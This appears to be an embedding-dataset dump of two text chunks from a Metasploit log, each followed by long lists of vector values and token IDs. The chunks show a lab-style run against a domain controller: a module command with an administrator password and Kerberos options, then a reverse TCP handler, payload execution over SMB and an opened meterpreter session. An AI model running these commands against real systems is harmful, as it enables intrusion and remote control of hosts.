8586, 1007, 1028 ]
metasploit
11.txt
2
run rhost = 192. 168. 123. 13 username = administrator password = p4 $ $ w0rd smb : : auth = kerberos domaincontrollerrhost = 192. 168. 123. 13 smb : : rhostname = dc3. demo. local domain = demo. local [ * ] started reverse tcp handler on 192. 168. 123. 1 : 4444 [ * ] 192. 168. 123. 13 : 445 - connecting to the server... [ * ] 192. 168. 123. 13 : 445 - authenticating to 192. 168. 123. 13 : 445 | demo. local as user'administrator '... [ + ] 192. 168. 123. 13 : 445 - 192. 168. 123. 13 : 88 - received a valid tgt - response [ * ] 192. 168. 123. 13 : 445 - 192. 168. 123. 13 : 445 - tgt mit credential cache ticket saved to / users / user /. msf4 / loot / 20230118120911 _ default _ 192. 168. 123. 13 _ mit. kerberos. cca _ 474531. bin [ + ] 192. 168. 123. 13 : 445 - 192. 168. 123. 13 : 88 - received a valid tgs - response [ * ] 192. 168. 123. 13 : 445 - 192. 168. 123. 13 : 445 - tgs mit credential cache ticket saved to / users / user /. msf4 / loot / 20230118120911 _ default _ 192. 168. 123. 13 _ mit. kerberos. cca _ 169149. bin [ + ] 192. 168. 123. 13 : 445 - 192. 168. 123. 13 : 88 - received a valid delegation tgs - response [ * ] 192. 168. 123. 13 : 445 - selecting powershell target [ * ] 192. 168. 123. 13 : 445 - executing the payload... [ + ] 192. 168. 123. 13 : 445 - service start timed out, ok if running a command or non - service executable... [ * ] sending stage ( 175686 bytes ) to 192. 168. 123. 13 [ * ] meterpreter session 6 opened ( 192. 168. 123. 1 :
[ 0.46028995513916016, -0.65089350938797, -0.6585744023323059, 0.4285610318183899, -0.27607429027557373, -0.4384829103946686, -0.3006289005279541, 0.518864631652832, 0.49604541063308716, 0.17647519707679749, -0.24542200565338135, 0.5359533429145813, 0.6688475608825684, -0.36534860730171204, -0.8409461975097656, -0.7119202017784119, -0.7600241899490356, -0.5694770812988281, -1.4698452949523926, -0.5056464672088623, -0.30328065156936646, 0.21436087787151337, -1.1119228601455688, -0.7781767249107361, -0.0790446475148201, 0.6941450238227844, 0.9770448803901672, 0.4753125309944153, 0.42913225293159485, 0.39426353573799133, 0.224563866853714, -0.192221537232399, -0.05031943321228027, -0.4088783264160156, 0.1153058111667633, 0.10033508390188217, 0.9115375876426697, -0.33175668120384216, -0.050390779972076416, -1.0129989385604858, -0.3547702729701996, -0.35745805501937866, -0.10857994854450226, -0.676869809627533, -0.6775416731834412, -0.8564431071281433, 0.37971410155296326, -0.2870917320251465, 0.8519467115402222, -0.28202471137046814, 0.62949538230896, 1.0643646717071533, 0.4771624803543091, -0.006235683336853981, -0.2901117205619812, 0.24845251441001892, -0.5926767587661743, 0.10115139931440353, -0.6370941400527954, -0.22719651460647583, -0.04681285843253136, 0.5469541549682617, 0.17148885130882263, -1.1849063634872437, 0.6064014434814453, 0.20357774198055267, 0.4686829149723053, -0.5784431099891663, -0.17544426023960114, -0.540660560131073, -0.5398193597793579, 0.5757379531860352, -0.9756212830543518, -0.506234884262085, -0.7228108644485474, 0.22468455135822296, -0.11386767029762268, -0.38711753487586975, -0.14847201108932495, 0.1594342738389969, 0.012291323393583298, 0.5947915315628052, 0.15240633487701416, -0.30324921011924744, -0.7459502220153809, -0.27737191319465637, 1.0784962177276611, 0.9565027952194214, -0.30229464173316956, 0.21829232573509216, 0.6457586884498596, 0.2723807692527771, -0.5557170510292053, -0.6180686950683594, 0.17623776197433472, 0.8252161741256714, -0.700469970703125, 0.3140867352485657, 0.27014780044555664, -0.09905368834733963, 1.059348464012146, 1.043220043182373, -0.187741219997406, 0.04164804145693779, -0.3476542830467224, 0.6882425546646118, 0.14663165807724, -0.2186787724494934, -0.40950217843055725, -0.23217451572418213, 0.3886418640613556, -0.12627916038036346, 0.0003365275915712118, -0.6258960366249084, 0.10152873396873474, 0.5759091377258301, -0.06336444616317749, -0.015516620129346848, -0.6025901436805725, 0.8158466815948486, -0.6020110249519348, -0.013930258341133595, 0.46837589144706726, -0.21292877197265625, 0.2552323341369629, -0.05449666827917099, 0.41368380188941956, 0.5926539301872253, -0.7795136570930481, -0.507829487323761, -0.5903043746948242, -0.46535614132881165, -0.47135359048843384, 0.3844701647758484, -0.10846652835607529, 0.5667179226875305, -0.058686986565589905, 0.37277770042419434, 0.9929990172386169, -1.1793806552886963, 0.15342871844768524, 0.024152569472789764, 0.09252990782260895, 1.9007045030593872, 0.017838669940829277, -0.558547854423523, -0.30291658639907837, -0.006443214602768421, -0.6143389344215393, 0.7612918019294739, -0.21757376194000244, -0.4533112645149231, 0.23686140775680542, -0.14461448788642883, -0.8017301559448242, 0.4264986217021942, -0.2979356646537781, 0.36649012565612793, -0.7817140817642212, 0.4198874831199646, -0.6578004956245422, 0.7429941892623901, 0.16843357682228088, 0.4619481861591339, 0.19681020081043243, 0.5490943193435669, -0.2695704400539398, -0.3771323263645172, -0.6164791584014893, -0.3391822576522827, 0.18924163281917572, 0.26123255491256714, 0.02677554450929165, 0.4550650119781494, 1.6541138887405396, 0.7002309560775757, -0.14091011881828308, -0.16189858317375183, 0.8925995826721191, 0.6318466067314148, -1.072514533996582, 0.13794565200805664, -0.1145261749625206, 0.7045868635177612, 0.09930230677127838, 0.4209558665752411, 0.3175230026245117, -0.7178478837013245, -0.5898538827896118, -0.17014586925506592, -0.35302188992500305, 0.961892306804657, -0.407501757144928, 0.8494263291358948, 0.8714058995246887, -0.09698525071144104, -0.794573187828064, -0.2307799905538559, -0.4676515758037567, -1.6029565334320068, -0.49412912130355835, 0.7782031893730164, -0.12083139270544052, 0.9846369624137878, 0.13580849766731262, -0.2555403411388397, 0.6934840083122253, 1.042707085609436, -0.4822371006011963, 0.3918663561344147, 0.9599795341491699, 0.5604831576347351, -0.3991456925868988, -0.043174345046281815, 0.7056615948677063, -0.2640340328216553, -1.3950673341751099, 0.3753165304660797, 0.130700021982193, -0.43668216466903687, -0.04124649241566658, 1.1313806772232056, 0.30129048228263855, 0.531528651714325, -0.2572694420814514, -0.23709960281848907, -0.3503676950931549, 0.40459346771240234, -0.2071237862110138, -0.11487194895744324, -0.7932869791984558, 0.8647561073303223, 0.5747010111808777, 1.3873051404953003, -0.04814385995268822, -0.016434723511338234, 0.5074445605278015, 0.42182666063308716, -0.12487801909446716, -0.09791690856218338, -0.26857712864875793, 0.9919251203536987, 1.0480278730392456, 0.9304720163345337, 0.30631223320961, 0.052639394998550415, 0.06274527311325073, -0.336199551820755, -0.21610817313194275, 0.4443283677101135, -0.07416023313999176, 1.4999172687530518, 0.2836085259914398, 0.062301039695739746, -0.6419157981872559, -0.7693489789962769, 0.01731337234377861, 1.496731162071228, -0.7143299579620361, -1.6055169105529785, -0.05890456214547157, -0.8484156727790833, -0.8286842703819275, -0.45916125178337097, 0.5474526882171631, 0.5095378756523132, -0.25508761405944824, 0.38187840580940247, -0.2201727330684662, -0.4513288140296936, -0.7824141383171082, -0.3078722655773163, -0.9531928300857544, -0.55030757188797, -0.9222826957702637, 0.3237423300743103, 0.756726086139679, 0.11850523203611374, 0.668782651424408, -0.20117826759815216, -0.7605487704277039, 0.48287755250930786, -0.19203068315982819, 0.6247005462646484, -0.10249833017587662, -0.21569204330444336, -0.8190255165100098, 0.006436614785343409, -0.5723192095756531, 0.1497470885515213, -0.7640953660011292, 0.2078331857919693, 0.23952540755271912, -0.006272964179515839, 0.37389957904815674, -0.6513721346855164, 0.3194383680820465, 0.22068144381046295, -0.06800447404384613, -0.45006048679351807, -0.5632637143135071, 0.11282488703727722, 0.58893883228302, 0.1882566213607788, -0.43722811341285706, 0.8299812078475952, 0.10334628075361252, -0.2145850658416748, 0.5515972375869751, 0.2705118656158447, -0.38017281889915466, 0.30848240852355957, 0.2027139961719513, -0.03229844197630882, -1.0951122045516968, 1.0956631898880005, 0.45262664556503296, -0.009539761580526829, -0.1811465322971344, -0.3504308760166168, 0.1518574208021164, -0.13446144759655, -0.21350406110286713, -0.7693461775779724, -0.13498805463314056, 0.49533703923225403, 0.22194914519786835, -1.0242472887039185, 0.47149425745010376, -0.35044974088668823, -0.5950645804405212, -0.10893771797418594, -0.9875698089599609, 0.42308345437049866, 0.35542747378349304, 0.7155789136886597, -0.28719714283943176, -0.5021810531616211, 0.20144084095954895, -0.12484277039766312, 0.19105324149131775, -0.4836482107639313, 0.49013376235961914, 0.7395269870758057, -0.7569258213043213, 0.6359094381332397, 0.2458890676498413, -0.22691909968852997, -0.014059465378522873, -0.1909582018852234, 0.17602111399173737, -0.11576708406209946, 0.9560521245002747, 0.3701292872428894, 0.1397920846939087, 0.26143622398376465, -0.9180156588554382, -0.15748025476932526, -0.09592083841562271, 0.22212517261505127, 0.6505995988845825, -0.6037535667419434, 0.45832836627960205, -0.36539462208747864, -0.5769714117050171, -0.3062818944454193, 0.3633746802806854, -0.08288038522005081, 1.0101364850997925, -0.43123742938041687, 1.1027125120162964, -0.20573633909225464, 0.24213756620883942, 0.36235877871513367, -0.8357254266738892, -0.8446024060249329, 0.6489651799201965, -0.0176372230052948, 1.0034443140029907, -0.3435116708278656, 0.38212043046951294, -0.0025515807792544365, -0.2150714248418808, 0.8475163578987122, 0.007435425650328398, -0.12993696331977844, -0.5869379043579102, -0.37861835956573486, 0.031507670879364014, -0.5178655982017517, -0.0179267767816782, 0.27537059783935547, 0.03945157676935196, -0.3046647012233734, -0.5573288798332214, -0.479469895362854, 0.7117750644683838, 1.3222819566726685, 1.5177134275436401, 0.3907346725463867, 0.26935118436813354, -0.08727015554904938, -0.37926149368286133, 0.6171168684959412, -0.5754637718200684, 0.7356774806976318, -0.2282857745885849, 0.8710026144981384, 0.29361945390701294, -0.06876254081726074, -0.8552138805389404, 0.34347426891326904, -0.2710604965686798, -0.07464329153299332, 0.32941240072250366, -0.5122953057289124, -0.2083905190229416, -0.11597944796085358, 0.2041439563035965, -0.3402117192745209, -0.5032011866569519, -0.06975502520799637, -0.2775038778781891, 1.6614022254943848, 0.09312598407268524, -0.4905581474304199, -0.23364700376987457, -0.8068956732749939, 0.3855770230293274, 0.24494755268096924, -0.05069683864712715, -0.17957548797130585, -0.9870683550834656, -0.719247579574585, -0.9350055456161499, 0.07463795691728592, -0.0266968235373497, -0.04862695559859276, -0.3355165123939514, -1.0270379781723022, 0.09770332276821136, 0.2497946172952652, 0.014487684704363346, -1.0981873273849487, -0.3564155101776123, 0.09910683333873749, 0.41034412384033203, 0.9468145966529846, -0.533164381980896, -0.6098546981811523, -0.034255944192409515, -0.7562013268470764, 0.33094194531440735, -0.7840707898139954, 0.06528917700052261, 0.5043898224830627, -0.4175472557544708, 0.0908791720867157, -0.13364601135253906, -0.8571208715438843, -0.189933642745018, -0.10671617090702057, 0.14235198497772217, -0.08420313149690628, -0.4729902744293213, 0.8309600949287415, -0.4201829135417938, -0.042955104261636734, 0.34487438201904297, 0.753056526184082, -0.1684931069612503, 0.4743896424770355, 0.12570732831954956, -0.23240885138511658, 0.2871277630329132, -0.6782057881355286, 0.5152792930603027, 0.012276709079742432, -0.21422676742076874, 0.7213664650917053, 0.1259743571281433, 0.3882991671562195, 0.14424125850200653, 0.5224892497062683, -0.3201504945755005, -0.811703085899353, -0.11438361555337906, 0.9878247976303101, 0.0678909495472908, 0.16847968101501465, -0.270689994096756, -0.10554269701242447, -0.1109050065279007, -0.8460868000984192, -0.6951085925102234, -0.7826147675514221, 0.037439096719026566, -0.06175747513771057, 0.6470836400985718, 0.49390196800231934, 0.3041684627532959, -0.2525283694267273, -1.0402439832687378, -0.0006162865902297199, -0.8118958473205566, 0.4078996181488037, -1.1784498691558838, 0.061711739748716354, -1.0568573474884033, 0.10236646980047226, -0.45059818029403687, -0.48305049538612366, 0.3388979434967041, 0.1685321033000946, -0.68608558177948, 1.311609148979187, 0.43352705240249634, -0.040030356496572495, -0.06671654433012009, 0.5473819375038147, 0.3315073847770691, -0.8439841866493225, -0.153269425034523, 1.0208470821380615, 0.15389610826969147, 0.6850875616073608, 0.17228004336357117, -0.201995387673378, -0.36030030250549316, -1.6827930212020874, -0.23575203120708466, -0.5756173133850098, 0.08747909963130951, -0.44727495312690735, -0.6375454068183899, -0.7615270614624023, 0.20799456536769867, -0.08948157727718353, -1.1108810901641846, -0.21205158531665802, -0.32618075609207153, 0.4501795470714569, 0.2846205532550812, 0.3196874260902405, -0.4823574125766754, -0.49322304129600525, 0.03498884662985802, 1.19827139377594, -0.17578862607479095, 0.1802244484424591, 0.300024151802063, 0.7215890288352966, 0.6331846117973328, 0.1383916437625885, -1.0714808702468872, -0.9062432050704956, 0.043143514543771744, 0.2355637103319168, 0.33679699897766113, 1.1158825159072876, -0.09497278183698654, 0.19826294481754303, -0.09342566877603531, -0.2527826130390167, -0.24761754274368286, 0.2933598756790161, -0.652320921421051, 0.2944719195365906, 0.5500282049179077, -0.3535520136356354, 0.306771844625473, -0.22144034504890442, 0.6770614385604858, 0.603035569190979, -0.6326463222503662, -0.505590558052063, -0.3508433401584625, -0.10388531535863876, -0.8013672232627869, 0.3247990906238556, 0.08169791847467422, -0.5980128049850464, 0.22036443650722504, 0.11636392772197723, 0.5697550773620605, -0.3642697036266327, 0.45789146423339844, 1.2485417127609253, 0.2591152489185333, 0.2615070939064026, -1.4046248197555542, 1.0782005786895752, 0.4886772930622101, 0.08511458337306976, -0.1587749421596527, -0.8674883842468262, -0.43177667260169983, 0.06979764997959137, -0.5904889702796936, -0.4390070140361786, -0.2763720154762268, -0.5281375646591187, -0.03038109838962555, -0.5174139738082886, 0.826229989528656, -0.5812051296234131, -0.2894498407840729, -0.3957223892211914, 0.6555048823356628, 0.5276296138763428, -0.34859171509742737, 0.30310001969337463, 0.5582572817802429, 0.4848892390727997, -0.3157985508441925, 0.30756276845932007, -0.09455214440822601, -0.12245338410139084, 0.7612455487251282, -0.41656291484832764, -0.5377696752548218, 0.8081268072128296, 0.6609113216400146, -1.5759440660476685, 0.037220828235149384, -0.3332207202911377, -0.10340864211320877, -0.11439348012208939, -0.699190616607666, -0.3295859098434448, 0.2039434164762497, 0.2432207614183426, 0.37440529465675354, 1.041406273841858, 0.4319518208503723, 0.3221331536769867, -0.9553701877593994, -0.007053372450172901, 0.07966101169586182, 0.6717508435249329, 1.1024693250656128, -0.6122760772705078, -0.35936808586120605, -1.2596580982208252, -0.23924823105335236, 0.24658530950546265, 0.28727591037750244, 0.5715345144271851, -0.5842678546905518, 0.756365954875946, 0.6977647542953491, 0.010727078653872013, 0.5632950067520142, 0.07571991533041, 0.6004327535629272, 1.3817371129989624, 0.12088652700185776, -0.9175587296485901, -0.6021077036857605, 0.42795494198799133, -0.07574576884508133, 0.7844477891921997, 0.03671727329492569, -0.1824006885290146, -0.0525965541601181, 0.5016492605209351, -0.5703724026679993, -0.6257422566413879, -1.0310800075531006, -0.798591136932373, -0.6864688396453857, 0.2102014124393463, -0.16012918949127197, -0.16588526964187622, -0.22927223145961761, -0.3805127739906311, -0.29920467734336853, -1.246562123298645, -0.2910361588001251, -0.20336340367794037, 0.02964109368622303, -0.3003486096858978, 0.7196001410484314, -1.2502769231796265, -0.24461747705936432, -0.42128029465675354, 0.07946540415287018, -0.11376383155584335, -0.5718829035758972, -0.4507932662963867, 0.31013357639312744, -0.40104538202285767, 0.4065779149532318, -0.34881284832954407, -0.004107848275452852, 0.2041756510734558, -0.8211901187896729, 0.10814133286476135, 1.4437682628631592, -0.43471020460128784, 0.7458713054656982, 0.064079649746418, 0.18369461596012115, 0.349552184343338, -0.6437042951583862, -0.3549550473690033, 0.13244721293449402, -0.4148406982421875, 0.8807928562164307, 0.3262750804424286, -0.6639912128448486, 0.2316957712173462, 0.5664282441139221, -0.6797377467155457, -0.4422230124473572, -0.640209972858429, -0.020071793347597122, 0.39124253392219543, -0.17621733248233795, 0.5183214545249939, 0.9851270914077759, 0.23779095709323883, -0.018985630944371223, -0.7103687524795532, 0.6644023656845093, 0.02203156054019928, -0.1589667946100235, -0.16049166023731232, -0.43441322445869446, -0.07326579093933105, 0.22297225892543793, 0.11669738590717316, 0.1883886605501175, -0.352565735578537, 0.27152377367019653, 0.013369266875088215, -0.019872348755598068, -0.9328573942184448, -0.4326598346233368, 0.056831587105989456, 0.5544535517692566, -0.014840713702142239, -0.04480742663145065, 0.12012703716754913, -0.37448686361312866, -0.898592472076416, 0.5974746346473694, -1.219502329826355, 0.10549458116292953, 0.04900166019797325, -0.3490019738674164, -0.21865414083003998, -0.7690444588661194, -0.8815760016441345, 0.1342078000307083, -0.28432348370552063, -0.6085871458053589, 0.3558458089828491, -0.007291832938790321, 0.2583972215652466, 0.94233638048172, -0.9375292658805847, -0.6194297671318054, -0.11745010316371918, 0.2725508511066437, -0.9096120595932007, -1.2155430316925049, 0.37645670771598816, 0.40528473258018494, 0.4200882315635681, -0.061358798295259476, -0.6035053730010986, 0.026071760803461075, 0.3769961893558502, 0.20531827211380005, -0.1717246174812317, 0.4222695827484131, -0.152602419257164, 0.5835410356521606, -0.22912612557411194, 0.19499535858631134, -0.07186141610145569, 0.6875941157341003, 0.7142502665519714, -0.004459773655980825, -0.27492576837539673, 0.7182018756866455, 0.06448550522327423, -0.45465296506881714, 1.1059578657150269, 0.40126392245292664, 0.3238903880119324, -0.4646381735801697, 0.24572938680648804, -0.3610553443431854, 0.3658685088157654, 0.21442639827728271, 0.24136993288993835, -0.22937016189098358, 0.553898811340332, 0.43662428855895996, -0.4029936194419861, -0.7380830645561218, 0.7160773277282715, 0.27798211574554443, -0.3968369960784912, 0.5195793509483337, -0.6390345692634583, -0.3802603781223297, 0.35463598370552063, -0.6599962711334229, -0.17556346952915192, 0.4436756670475006, 0.20416617393493652, -0.011836492456495762, -0.4479306936264038, 0.7616099119186401, -0.39622384309768677, 0.7118553519248962, -0.14870935678482056, 0.023091996088624, -0.17678934335708618, 0.676701009273529, -0.29728999733924866, 0.36055782437324524, 0.8928199410438538, 0.4011404514312744, 0.2276996225118637, 0.44424736499786377, -0.432774156332016, 1.0843974351882935, 0.24666708707809448, 0.2174113690853119, -0.4601230323314667, -0.23000505566596985, 0.04079810157418251, -0.5667142271995544, -0.6746969223022461, 0.022598030045628548, -0.39618879556655884, 0.12933534383773804, 0.7759776711463928, -0.4369466006755829, 0.1335049718618393, -0.3037615120410919, 0.13166745007038116, -0.3200974762439728, 0.25939124822616577, 0.2823072075843811, 0.04135700687766075, -0.3375374972820282, 0.869377613067627, 0.1962641030550003, 1.1631180047988892, 0.338588684797287, 1.1948750019073486, 0.1106739267706871, 0.21658749878406525, -0.10833143442869186, 0.3369362950325012, -0.9272184371948242, -0.013551843352615833, -0.34414142370224, -0.3852481245994568, 0.6635156273841858, -0.048726387321949005, 0.793597400188446, -0.19671472907066345, -0.3953331708908081, -0.7828744053840637, 0.46572738885879517, -0.23024503886699677, -0.28780850768089294, 0.6332781314849854, 0.16263027489185333, -0.6488345265388489, 0.5283471345901489, 0.18915769457817078, 0.45236119627952576, 0.1466366946697235, -0.3783227801322937, -0.6834748387336731, -0.8561736941337585, -0.3590289354324341, 0.13168282806873322, 0.7405835390090942, -0.6569143533706665, -0.19391372799873352, -0.05621211230754852, -0.41956931352615356, -0.6554085612297058, -0.22433993220329285, -0.3724723160266876, -0.5564103126525879, 0.8568007946014404, 0.8478509783744812, 0.3701046407222748, 0.5189862847328186, -0.4401368498802185, -0.27436429262161255, 0.4068523347377777, 0.8962095379829407, 0.016106916591525078, 0.6352930665016174, 0.28917643427848816, 0.2585388720035553, 0.032675206661224365, -0.6948975920677185, 0.6868329048156738, 0.20411346852779388, -0.07009377330541611, -0.022668344900012016, -0.1748775839805603, -1.3162260055541992, -0.4595681428909302, 0.2120877504348755, -0.11605922132730484, 0.06457683444023132, -0.1851419359445572, -1.1974014043807983, 0.1268237829208374, -0.6003648042678833, -0.460054874420166, -0.8588967323303223, 0.3215349018573761, 0.8678884506225586, 0.12166054546833038, -0.40104156732559204, -1.0064697265625, 3.7961478233337402, 0.6263455748558044, 0.15562684834003448, 0.6822512149810791, 0.5215083956718445, 1.025862455368042, 1.2272446155548096, -0.23223398625850677, 0.41124022006988525, -0.1701250523328781, 1.0034481287002563, 0.6627072095870972, 0.7621845006942749, 0.4763762652873993, 0.650463342666626, 0.938715934753418, -0.6393700838088989, 0.46574750542640686, 0.7783961892127991, -0.861386239528656, -1.0042386054992676, -0.2397727221250534, -0.0643601268529892, 0.8239187002182007, 0.5466170310974121, -0.15927910804748535, 0.14141900837421417, -1.3304494619369507, 0.1319812536239624, -0.2292862981557846, -0.30847373604774475, -0.6516839265823364, 0.3262083828449249, -0.7031474113464355, -0.5735982656478882, 0.22620180249214172, -0.5007658004760742, -0.9185270071029663, -0.31715625524520874, -0.3498932123184204, 0.09766015410423279, 0.2938736379146576, 0.39588260650634766, -0.5298775434494019, 0.43484315276145935, 0.641172468662262, -0.39668145775794983, 0.2571481168270111, 0.8645884394645691, -1.0723903179168701, 0.46732214093208313, 0.11538605391979218, 0.4966747760772705, 0.2826243042945862, -0.41076645255088806, -0.03524108976125717, 0.3987869620323181, -0.2907547056674957, 0.05701848119497299, 0.260717511177063, 0.24639417231082916, -0.041604138910770416, 0.4337935745716095, -0.2962053418159485, -1.0695427656173706, 0.7094917893409729, -0.6473694443702698, 0.21419529616832733, -0.26561489701271057, -0.30221009254455566, -0.47528740763664246, -0.31297096610069275, -0.8690475225448608, -0.25626447796821594, 0.9575511813163757, 0.5905032753944397, -0.2550271153450012, 0.6183750033378601, 0.9538417458534241, -0.04228481277823448, -0.5589878559112549, -0.6631676554679871, -1.187105655670166, 0.5374400615692139, 0.2738741636276245, 0.4541366696357727, -0.22958065569400787, -1.2279412746429443, 0.03007468767464161, 0.12359556555747986, 0.9201204776763916, 0.4673384428024292, -0.2868904769420624, 0.39011022448539734, 0.007853149436414242 ]
[ 2448, 1054, 15006, 2102, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 5310, 18442, 1027, 8911, 20786, 1027, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 15488, 2497, 1024, 1024, 8740, 2705, 1027, 17710, 20473, 2891, 5884, 8663, 13181, 10820, 25032, 14122, 1027, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 15488, 2497, 1024, 1024, 1054, 15006, 2102, 18442, 1027, 5887, 2509, 1012, 9703, 1012, 2334, 5884, 1027, 9703, 1012, 2334, 1031, 1008, 1033, 2318, 7901, 22975, 2361, 28213, 2006, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 1024, 4008, 22932, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 7176, 2000, 1996, 8241, 1012, 1012, 1012, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 14469, 5844, 2000, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1064, 9703, 1012, 2334, 2004, 5310, 1005, 8911, 1005, 1012, 1012, 1012, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 1037, 9398, 1056, 13512, 1011, 3433, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 1056, 13512, 10210, 13675, 14728, 19909, 17053, 7281, 5552, 2000, 1013, 5198, 1013, 5310, 1013, 1012, 5796, 2546, 2549, 1013, 8840, 4140, 1013, 16798, 14142, 14526, 2620, 12521, 2692, 2683, 14526, 1035, 12398, 1035, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1035, 10210, 1012, 17710, 20473, 2891, 1012, 10507, 2050, 1035, 4700, 19961, 21486, 1012, 8026, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 1037, 9398, 1056, 5620, 1011, 3433, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 1056, 5620, 10210, 13675, 14728, 19909, 17053, 7281, 5552, 2000, 1013, 5198, 1013, 5310, 1013, 1012, 5796, 2546, 2549, 1013, 8840, 4140, 1013, 16798, 14142, 14526, 2620, 12521, 2692, 2683, 14526, 1035, 12398, 1035, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1035, 10210, 1012, 17710, 20473, 2891, 1012, 10507, 2050, 1035, 18582, 16932, 2683, 1012, 8026, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 1037, 9398, 10656, 1056, 5620, 1011, 3433, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 17739, 4204, 18223, 4539, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 23448, 1996, 18093, 1012, 1012, 1012, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 4008, 2629, 1011, 2326, 2707, 22313, 2041, 1010, 7929, 2065, 2770, 1037, 3094, 2030, 2512, 1011, 2326, 4654, 8586, 23056, 1012, 1012, 1012, 1031, 1008, 1033, 6016, 2754, 1006, 22370, 20842, 27507, 1007, 2000, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1031, 1008, 1033, 8316, 28139, 3334, 5219, 1020, 2441, 1006, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 1024 ]
metasploit
11.txt
3
4444 - > 192. 168. 123. 13 : 49738 ) at 2023 - 01 - 18 12 : 09 : 13 + 0000 meterpreter > [SEP]
[ -0.1406404972076416, -0.17433594167232513, -0.14799682796001434, -0.14958332479000092, 0.034439653158187866, -0.05725868418812752, 0.30066245794296265, -0.04386908560991287, -0.13682399690151215, 1.17742919921875, 0.695041835308075, 0.1531539410352707, -0.10232144594192505, -0.5760775804519653, -0.06581483036279678, -0.05283421650528908, -0.38347840309143066, -0.6993035674095154, 0.6339688897132874, -0.26450031995773315, 0.19371546804904938, 0.7146331071853638, -1.1296981573104858, -0.13731372356414795, -0.5666304230690002, 0.08107001334428787, -0.2371329516172409, -0.00033112464006990194, 0.20935441553592682, 0.9761257171630859, 0.0949007198214531, -0.839431643486023, 0.3166762590408325, -0.9207397103309631, -0.41408678889274597, -0.4952509105205536, 0.5324121713638306, -0.28712522983551025, -0.35782700777053833, -0.9701414108276367, -0.0005573168746195734, -0.27356866002082825, 0.6461231112480164, -0.8516557812690735, -0.044187791645526886, -0.3841392695903778, -0.33367660641670227, 0.23480205237865448, 0.09674041718244553, -0.991793692111969, -0.6039742827415466, 0.2935032546520233, 0.710070013999939, -0.49072322249412537, 0.6905760765075684, -0.020384570583701134, -0.23325255513191223, -0.41929715871810913, -0.5508779883384705, 0.4428716003894806, -0.3356867730617523, 0.43346744775772095, 0.08554548025131226, -0.7158980369567871, -0.1919044703245163, 0.57199627161026, 0.1299128234386444, 0.2974865138530731, -0.2944227457046509, -0.451246440410614, -0.14460672438144684, -0.098434217274189, -0.7239854335784912, 0.4026290476322174, -0.017418311908841133, 0.8761118650436401, 0.03034975752234459, 0.7399126887321472, -0.07647650688886642, 1.0316258668899536, -0.011017398908734322, 0.3782697319984436, -0.4662252366542816, 0.17416568100452423, -0.10711000859737396, -0.44185978174209595, 0.028889207169413567, -0.18627558648586273, 0.14864832162857056, -0.1586683988571167, -0.005678738001734018, 0.36328017711639404, -0.4351816177368164, 0.00654669851064682, 0.30332592129707336, -0.5662541389465332, -0.05940278619527817, 0.9173526763916016, -0.3605975806713104, -0.08951319754123688, 0.08036665618419647, 1.1115269660949707, -0.6416627168655396, 0.66124027967453, -0.8756051063537598, 1.1253353357315063, 0.10466226935386658, -0.4587246775627136, -0.9862408638000488, -0.6509487628936768, 0.33296316862106323, -0.024001775309443474, 0.12416254729032516, 0.5627366900444031, -0.09151192009449005, 0.7138651013374329, -0.6825839281082153, -0.36908283829689026, 0.0786113291978836, -0.07778117805719376, 0.501619815826416, 0.05826476588845253, 0.017125124111771584, -0.03483457863330841, -0.35514041781425476, -0.6071566343307495, -0.267548531293869, 0.4922654926776886, -0.5371211767196655, -0.24954241514205933, 0.08905986696481705, -0.37791135907173157, 0.2646390497684479, 0.0038346797227859497, 1.1228768825531006, 0.2554469406604767, 0.41929593682289124, 0.17578887939453125, 0.5700832009315491, -0.2662438452243805, 0.44486522674560547, -0.6120914220809937, 0.7937790155410767, 1.8733513355255127, -1.1666653156280518, 0.4649653732776642, 0.23748070001602173, 0.2603261172771454, -0.33128172159194946, -0.15312643349170685, 0.00277926167473197, -0.31770798563957214, -0.4711149036884308, 0.2929084300994873, 0.3734074831008911, 0.2623232305049896, -0.5878797769546509, -0.43147552013397217, -0.20938818156719208, 0.3009946346282959, 0.7767437100410461, 0.5980979800224304, 0.007883765734732151, 0.3448369801044464, -0.5250756740570068, -0.1940670758485794, -0.8734936118125916, -0.7288705706596375, 0.1409066915512085, 0.03115364909172058, 0.3695228099822998, -0.757482647895813, -0.029065435752272606, 0.28858762979507446, -0.15717841684818268, 0.09243687242269516, -0.10288991034030914, 0.4097335934638977, 0.2558976411819458, -0.21434102952480316, 0.06768321990966797, 0.3770606517791748, 0.930631697177887, 0.6903917193412781, 0.07672787457704544, 0.5248700976371765, 0.49063897132873535, -0.7174553275108337, -0.5534784197807312, -0.6652905344963074, 0.23773910105228424, 0.5852809548377991, 0.10694941133260727, 